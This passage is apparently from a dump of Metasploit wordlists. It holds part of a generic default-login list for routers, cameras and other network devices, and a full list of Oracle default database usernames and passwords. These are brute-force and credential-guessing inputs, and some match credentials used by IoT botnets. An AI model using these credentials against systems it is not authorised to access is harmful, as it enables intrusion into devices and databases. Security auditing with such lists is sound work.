craft 212 | craft craftpw 213 | craft crftpw 214 | cusadmin highspeed 215 | cust custpw 216 | customer 217 | customer none 218 | dadmin dadmin01 219 | daemon 220 | davox davox 221 | debug d.e.b.u.g 222 | debug synnet 223 | default 224 | default antslq 225 | default default 226 | default password 227 | deskalt password 228 | deskman changeme 229 | desknorm password 230 | deskres password 231 | device device 232 | dhs3mt dhs3mt 233 | dhs3pms dhs3pms 234 | diag danger 235 | diag switch 236 | disttech 4tas 237 | draytek 1234 238 | e250 e250changeme 239 | e500 e500changeme 240 | echo User 241 | echo echo 242 | enable 243 | eng engineer 244 | enquiry enquirypw 245 | field support 246 | guest 247 | guest 1111 248 | guest 12345 249 | guest 123456 250 | guest User 251 | guest guest 252 | guest xc3511 253 | halt tlah 254 | helpdesk OCS 255 | hsa hsadb 256 | hscroot abc123 257 | hydrasna 258 | iclock timely 259 | images images 260 | inads inads 261 | inads indspw 262 | init initpw 263 | install llatsni 264 | install secret 265 | installer installer 266 | intel intel 267 | intermec intermec 268 | intermec intermec1QTPS 269 | jagadmin 270 | kermit kermit 271 | l2 l2 272 | l3 l3 273 | locate locatepw 274 | login 0 275 | login 1111 276 | login 8429 277 | login access 278 | login admin 279 | login password 280 | lp lp 281 | m1122 m1122 282 | mac 283 | maint maint 284 | maint maintpw 285 | maint ntacdmax 286 | maint rwmaint 287 | manage !manage 288 | manager admin 289 | manager change_on_install 290 | manager friend 291 | manager manager 292 | manager sys 293 | manuf xxyyzz 294 | mediator mediator 295 | mg3500 merlin 296 | mlusr mlusr 297 | monitor monitor 298 | mother fucker 299 | mtch mtch 300 | mtcl 301 | mtcl mtcl 302 | naadmin naadmin 303 | netangr attack 304 | netman 305 | netman netman 306 | netopia netopia 307 | netrangr attack 308 | netscreen netscreen 309 | nms nmspw 310 | nokai nokai 311 | nokia nokia 312 | none 0 313 | none admin 314 | op op 315 | op operator 316 | operator 317 | operator $chwarzepumpe 318 | operator 1234 319 | operator operator 320 | oracle oracle 321 | patrol patrol 322 | piranha piranha 323 | piranha q 324 | pmd 325 | poll tech 326 | public 327 | public public 328 | radware radware 329 | rapport r@p8p0r+ 330 | rcust rcustpw 331 | readonly lucenttech2 332 | readwrite lucenttech1 333 | recovery recovery 334 | replicator replicator 335 | ro ro 336 | root 337 | root 000000 338 | root 1111 339 | root 1234 340 | root 12345 341 | root 123456 342 | root 1234567890 343 | root 1234qwer 344 | root 123qwe 345 | root 1q2w3e4r5 346 | root 3ep5w2u 347 | root 54321 348 | root 666666 349 | root 7ujMko0admin 350 | root 7ujMko0vizxv 351 | root 888888 352 | root Admin 353 | root Cisco 354 | root GMB182 355 | root LSiuY7pOmZG2s 356 | root Mau'dib 357 | root PASSWORD 358 | root ROOT500 359 | root Serv4EMC 360 | root Zte521 361 | root abc123 362 | root admin 363 | root admin1234 364 | root admin_1 365 | root ahetzip8 366 | root alpine 367 | root anko 368 | root antslq 369 | root ascend 370 | root attack 371 | root avtech 372 | root b120root 373 | root bananapi 374 | root blender 375 | root calvin 376 | root changeme 377 | root cms500 378 | root comcom 379 | root coolphoenix579 380 | root davox 381 | root default 382 | root dreambox 383 | root fivranne 384 | root ggdaseuaimhrke 385 | root hi3518 386 | root iDirect 387 | root ikwb 388 | root ikwd 389 | root jauntech 390 | root juantech 391 | root jvbzd 392 | root klv123 393 | root klv1234 394 | root letacla 395 | root maxided 396 | root oelinux123 397 | root openssh 398 | root openvpnas 399 | root orion99 400 | root pa55w0rd 401 | root pass 402 | root password 403 | root permit 404 | root realtek 405 | root root 406 | root tini 407 | root tslinux 408 | root ubnt 409 | root user 410 | root vizxv 411 | root wyse 412 | root xc3511 413 | root xmhdipc 414 | root zlxx. 415 | root zte9x15 416 | router router 417 | rw rw 418 | rwa rwa 419 | sa 420 | scmadmin scmchangeme 421 | scout scout 422 | secret secret 423 | secure secure 424 | security security 425 | service smile 426 | setup changeme 427 | setup changeme! 428 | setup setup 429 | smc smcadmin 430 | spcl 0 431 | storwatch specialist 432 | stratacom stratauser 433 | su super 434 | super 5777364 435 | super super 436 | super surt 437 | super.super 438 | super.super master 439 | superadmin secret 440 | superman 21241036 441 | superman talent 442 | superuser 443 | superuser 123456 444 | superuser admin 445 | supervisor PlsChgMe! 446 | supervisor PlsChgMe1 447 | supervisor supervisor 448 | supervisor zyad1234 449 | support 123 450 | support 1234 451 | support 12345 452 | support 123456 453 | support admin 454 | support h179350 455 | support login 456 | support support 457 | support supportpw 458 | support zlxx. 459 | sys uplink 460 | sysadm Admin 461 | sysadm PASS 462 | sysadm anicust 463 | sysadm sysadm 464 | sysadmin PASS 465 | sysadmin password 466 | sysadmin sysadmin 467 | system change_on_install 468 | system password 469 | system sys 470 | system/manager sys/change_on_install 471 | target password 472 | teacher password 473 | tech 474 | tech ANYCOM 475 | tech ILMI 476 | tech field 477 | tech tech 478 | telco telco 479 | telecom telecom 480 | tellabs tellabs#1 481 | telnet telnet 482 | temp1 password 483 | test test 484 | tiara tiaranet 485 | tiger tiger123 486 | topicalt password 487 | topicnorm password 488 | topicres password 489 | ubnt ubnt 490 | user 491 | user 123456 492 | user pass 493 | user password 494 | user public 495 | user tivonpw 496 | user user 497 | vcr NetVCR 498 | volition volition 499 | vt100 public 500 | webadmin 1234 501 | webadmin webadmin 502 | websecadm changeme 503 | wlse wlsedb 504 | wradmin trancell 505 | write private 506 | xd xd 507 | xxx cascade 508 | -------------------------------------------------------------------------------- /wordlists/metasploit/oracle_default_userpass.txt: -------------------------------------------------------------------------------- 1 | brio_admin brio_admin 2 | brugernavn adgangskode 3 | brukernavn password 4 | bsc bsc 5 | bug_reports bug_reports 6 | calvin hobbes 7 | catalog catalog 8 | cct cct 9 | cdemo82 cdemo82 10 | cdemo82 cdemo83 11 | cdemo82 unknown 12 | cdemocor cdemocor 13 | cdemorid cdemorid 14 | cdemoucb cdemoucb 15 | cdouglas cdouglas 16 | ce ce 17 | centra centra 18 | central central 19 | cids cids 20 | cis cis 21 | cis zwerg 22 | cisinfo cisinfo 23 | cisinfo zwerg 24 | clark cloth 25 | cn cn 26 | company company 27 | compiere compiere 28 | cqschemauser password 29 | cquserdbuser password 30 | crp crp 31 | cs cs 32 | csc csc 33 | csd csd 34 | cse cse 35 | csf csf 36 | csi csi 37 | csl csl 38 | csmig csmig 39 | csp csp 40 | csr csr 41 | css css 42 | ctxdemo ctxdemo 43 | ctxsys change_on_install 44 | ctxsys ctxsys 45 | ctxsys unknown 46 | cua cua 47 | cue cue 48 | cuf cuf 49 | cug cug 50 | cui cui 51 | cun cun 52 | cup cup 53 | cus cus 54 | cz cz 55 | dbi mumblefratz 56 | hr change_on_install 57 | hr hr 58 | hri hri 59 | hvst hvst 60 | hxc hxc 61 | hxt hxt 62 | iba iba 63 | ibe ibe 64 | ibp ibp 65 | ibu ibu 66 | iby iby 67 | icdbown icdbown 68 | icx icx 69 | idemo_user idemo_user 70 | ieb ieb 71 | iec iec 72 | iem iem 73 | ieo ieo 74 | ies ies 75 | ieu ieu 76 | iex iex 77 | ifssys ifssys 78 | igc igc 79 | igf igf 80 | igi igi 81 | igs igs 82 | igw igw 83 | imageuser imageuser 84 | imc imc 85 | imedia imedia 86 | imt imt 87 | #internal oracle 88 | #internal sys_stnt 89 | internal oracle 90 | internal sys_stnt 91 | inv inv 92 | ipa ipa 93 | ipd ipd 94 | iplanet iplanet 95 | isc isc 96 | itg itg 97 | ja ja 98 | jake passwo4 99 | je je 100 | jg jg 101 | jill passwo2 102 | jl jl 103 | jmuser jmuser 104 | john john 105 | jones steel 106 | jtf jtf 107 | jtm jtm 108 | jts jts 109 | jward airoplane 110 | kwalker kwalker 111 | l2ldemo l2ldemo 112 | lbacsys lbacsys 113 | librarian shelves 114 | manprod manprod 115 | mark passwo3 116 | mascarm manager 117 | master password 118 | mddata mddata 119 | mddemo mddemo 120 | mddemo_clerk clerk 121 | mddemo_clerk mgr 122 | mddemo_mgr mddemo_mgr 123 | mdsys mdsys 124 | me me 125 | mfg mfg 126 | mgr mgr 127 | mgwuser mgwuser 128 | migrate migrate 129 | miller miller 130 | mmo2 mmo2 131 | mmo2 mmo3 132 | mmo2 unknown 133 | modtest yes 134 | moreau moreau 135 | mrp mrp 136 | msc msc 137 | msd msd 138 | mso mso 139 | msr msr 140 | mts_user mts_password 141 | mtssys mtssys 142 | mwa mwa 143 | mxagent mxagent 144 | names names 145 | neotix_sys neotix_sys 146 | nneul nneulpass 147 | nom_utilisateur mot_de_passe 148 | nomeutente password 149 | nome_utilizador senha 150 | nume_utilizator parol 151 | oas_public oas_public 152 | ocitest ocitest 153 | ocm_db_admin ocm_db_admin 154 | odm odm 155 | odm_mtr mtrpw 156 | ods ods 157 | ods_server ods_server 158 | odscommon odscommon 159 | oe change_on_install 160 | oe unknown 161 | oe oe 162 | oemadm oemadm 163 | oemrep oemrep 164 | okb okb 165 | okc okc 166 | oke oke 167 | oki oki 168 | oko oko 169 | okr okr 170 | oks oks 171 | okx okx 172 | olapdba olapdba 173 | olapsvr instance 174 | olapsvr olapsvr 175 | olapsys manager 176 | olapsys olapsys 177 | omwb_emulation oracle 178 | ont ont 179 | oo oo 180 | openspirit openspirit 181 | opi opi 182 | oracache oracache 183 | oracle oracle 184 | oradba oradbapass 185 | oraprobe oraprobe 186 | oraregsys oraregsys 187 | orasso orasso 188 | orasso_ds orasso_ds 189 | orasso_pa orasso_pa 190 | orasso_ps orasso_ps 191 | orasso_public orasso_public 192 | orastat orastat 193 | orcladmin welcome 194 | ordcommon ordcommon 195 | data_schema laskjdf098ksdaf09 196 | dbsnmp dbsnmp 197 | dbvision dbvision 198 | ddic 199220706 199 | demo demo 200 | demo8 demo8 201 | demo9 demo9 202 | des des 203 | des2k des2k 204 | dev2000_demos dev2000_demos 205 | diane passwo1 206 | dip dip 207 | discoverer_admin discoverer_admin 208 | dmsys dmsys 209 | dpf dpfpass 210 | dsgateway dsgateway 211 | dssys dssys 212 | dtsp dtsp 213 | eaa eaa 214 | eam eam 215 | earlywatch support 216 | east east 217 | ec ec 218 | ecx ecx 219 | ejb ejb 220 | ejsadmin ejsadmin 221 | ejsadmin ejsadmin_password 222 | emp emp 223 | eng eng 224 | eni eni 225 | estoreuser estore 226 | event event 227 | evm evm 228 | example example 229 | exfsys exfsys 230 | extdemo extdemo 231 | extdemo2 extdemo2 232 | fa fa 233 | fem fem 234 | fii fii 235 | finance finance 236 | finprod finprod 237 | flm flm 238 | fnd fnd 239 | foo bar 240 | fpt fpt 241 | frm frm 242 | frosty snowman 243 | fte fte 244 | fv fv 245 | gl gl 246 | gma gma 247 | gmd gmd 248 | gme gme 249 | gmf gmf 250 | gmi gmi 251 | gml gml 252 | gmp gmp 253 | gms gms 254 | gpfd gpfd 255 | gpld gpld 256 | gr gr 257 | hades hades 258 | hcpark hcpark 259 | hlw hlw 260 | hr unknown 261 | abm abm 262 | adams wood 263 | adldemo adldemo 264 | admin jetspeed 265 | admin welcome 266 | administrator admin 267 | administrator administrator 268 | ahl ahl 269 | ahm ahm 270 | ak ak 271 | alhro xxx 272 | alhrw xxx 273 | alr alr 274 | ams ams 275 | amv amv 276 | andy swordfish 277 | anonymous anonymous 278 | ap ap 279 | applmgr applmgr 280 | applsys applsys 281 | applsys apps 282 | applsys fnd 283 | applsyspub applsyspub 284 | applsyspub pub 285 | applsyspub fndpub 286 | applysyspub fndpub 287 | applysyspub pub 288 | apps apps 289 | apps_mrc apps 290 | appuser apppassword 291 | aq aq 292 | aqdemo aqdemo 293 | aqjava aqjava 294 | aquser aquser 295 | ar ar 296 | asf asf 297 | asg asg 298 | asl asl 299 | aso aso 300 | asp asp 301 | ast ast 302 | atm sampleatm 303 | audiouser audiouser 304 | aurora$jis$utility$ invalid 305 | aurora$orb$unauthenticated invalid 306 | ax ax 307 | az az 308 | bc4j bc4j 309 | ben ben 310 | bic bic 311 | bil bil 312 | bim bim 313 | bis bis 314 | biv biv 315 | bix bix 316 | blake paper 317 | blewis blewis 318 | bom bom 319 | sysman sysman 320 | system change_on_install 321 | system d_syspw 322 | system manager 323 | system oracle 324 | system systempass 325 | system system 326 | system manag3r 327 | system oracl3 328 | system 0racle 329 | system 0racl3 330 | system oracle8 331 | system oracle9 332 | system oracle9i 333 | system 0racle9i 334 | system 0racl39i 335 | tahiti tahiti 336 | talbot mt6ch5 337 | tdos_icsap tdos_icsap 338 | tec tectec 339 | test passwd 340 | test test 341 | test_user test_user 342 | testpilot testpilot 343 | thinsample thinsamplepw 344 | tibco tibco 345 | tip37 tip37 346 | tracesvr trace 347 | travel travel 348 | tsdev tsdev 349 | tsuser tsuser 350 | turbine turbine 351 | ultimate ultimate 352 | um_admin um_admin 353 | um_client um_client 354 | user user 355 | user_name password 356 | user0 user0 357 | user1 user1 358 | user2 user2 359 | user3 user3 360 | user4 user4 361 | user5 user5 362 | user6 user6 363 | user7 user7 364 | user8 user8 365 | user9 user9 366 | utility utility 367 | usuario clave 368 | utlbstatu utlestat 369 | vea vea 370 | veh veh 371 | vertex_login vertex_login 372 | videouser videouser 373 | vif_developer vif_dev_pwd 374 | viruser viruser 375 | vpd_admin akf7d98s2 376 | vrr1 vrr1 377 | vrr1 vrr2 378 | vrr1 unknown 379 | webcal01 webcal01 380 | webdb webdb 381 | webread webread 382 | websys manager 383 | webuser your_pass 384 | west west 385 | wfadmin wfadmin 386 | wh wh 387 | wip wip 388 | wkadmin wkadmin 389 | wkproxy wkproxy 390 | wkproxy change_on_install 391 | wksys change_on_install 392 | wkproxy unknown 393 | wksys wksys 394 | wkuser wkuser 395 | wk_test wk_test 396 | wms wms 397 | wmsys wmsys 398 | wob wob 399 | wps wps 400 | wsh wsh 401 | wsm wsm 402 | www www 403 | wwwuser wwwuser 404 | xademo xademo 405 | xdb change_on_install 406 | xdp xdp 407 | xla xla 408 | xnc xnc 409 | xni xni 410 | xnm xnm 411 | xnp xnp 412 | xns xns 413 | xprt xprt 414 | xtr xtr 415 | mddemo_mgr mgr 416 | system d_systpw 417 | system oracle8i 418 | system 0racle8 419 | system 0racle9 420 | system 0racle8i 421 | system 0racl38 422 | system 0racl39 423 | system 0racl38i 424 | sys 0racle8 425 | sys 0racle9 426 | sys 0racle8i 427 | sys 0racl38 428 | sys 0racl39 429 | sys 0racl38i 430 | ordplugins ordplugins 431 | ordsys ordsys 432 | ose$http$admin invalid password 433 | ose$http$admin invalid 434 | osm osm 435 | osp22 osp22 436 | ota ota 437 | outln outln 438 | owa owa 439 | owa_public owa_public 440 | owf_mgr owf_mgr 441 | owner owner 442 | ozf ozf 443 | ozp ozp 444 | ozs ozs 445 | pa pa 446 | panama panama 447 | patrol patrol 448 | paul paul 449 | perfstat perfstat 450 | perstat perstat 451 | pjm pjm 452 | planning planning 453 | plex plex 454 | plsql supersecret 455 | pm change_on_install 456 | pm unknown 457 | pm pm 458 | pmi pmi 459 | pn pn 460 | po po 461 | po7 po7 462 | po8 po8 463 | poa poa 464 | pom pom 465 | portal_demo portal_demo 466 | portal_sso_ps portal_sso_ps 467 | portal30 portal30 468 | portal30 portal31 469 | portal30_admin portal30_admin 470 | portal30_demo portal30_demo 471 | portal30_ps portal30_ps 472 | portal30_public portal30_public 473 | portal30_sso portal30_sso 474 | portal30_sso_admin portal30_sso_admin 475 | portal30_sso_ps portal30_sso_ps 476 | portal30_sso_public portal30_sso_public 477 | pos pos 478 | powercartuser powercartuser 479 | primary primary 480 | psa psa 481 | psb psb 482 | psp psp 483 | pubsub pubsub 484 | pubsub1 pubsub1 485 | pv pv 486 | qa qa 487 | qdba qdba 488 | qp qp 489 | qs change_on_install 490 | qs qs 491 | qs unknown 492 | qs_adm change_on_install 493 | qs_adm qs_adm 494 | qs_adm unknown 495 | qs_cb change_on_install 496 | qs_cb qs_cb 497 | qs_cb unknown 498 | qs_cbadm change_on_install 499 | qs_cbadm qs_cbadm 500 | qs_cbadm unknown 501 | qs_cs change_on_install 502 | qs_cs qs_cs 503 | qs_cs unknown 504 | qs_es change_on_install 505 | qs_es qs_es 506 | qs_es unknown 507 | qs_os change_on_install 508 | qs_os qs_os 509 | qs_os unknown 510 | qs_ws change_on_install 511 | qs_ws qs_ws 512 | qs_ws unknown 513 | re re 514 | rep_manager demo 515 | rep_owner demo 516 | rep_owner rep_owner 517 | rep_user demo 518 | repadmin repadmin 519 | reports_user oem_temp 520 | reports reports 521 | rg rg 522 | rhx rhx 523 | rla rla 524 | rlm rlm 525 | rmail rmail 526 | rman rman 527 | rrs rrs 528 | sample sample 529 | sap sapr3 530 | sap 06071992 531 | sapr3 sap 532 | scott tiger 533 | scott tigger 534 | sdos_icsap sdos_icsap 535 | secdemo secdemo 536 | serviceconsumer1 serviceconsumer1 537 | sh change_on_install 538 | sh sh 539 | sh unknown 540 | siteminder siteminder 541 | si_informtn_schema si_informtn_schema 542 | slide slidepw 543 | spierson spierson 544 | ssp ssp 545 | starter starter 546 | strat_user strat_passwd 547 | swpro swpro 548 | swuser swuser 549 | sympa sympa 550 | sys change_on_install 551 | sys d_syspw 552 | sys manager 553 | sys oracle 554 | sys sys 555 | sys syspass 556 | sys manag3r 557 | sys oracl3 558 | sys 0racle 559 | sys 0racl3 560 | sys oracle8 561 | sys oracle9 562 | sys oracle8i 563 | sys oracle9i 564 | sys 0racle9i 565 | sys 0racl39i 566 | sysadm sysadm 567 | sysadmin sysadmin 568 | sysman oem_temp 569 | --------------------------------------------------------------------------------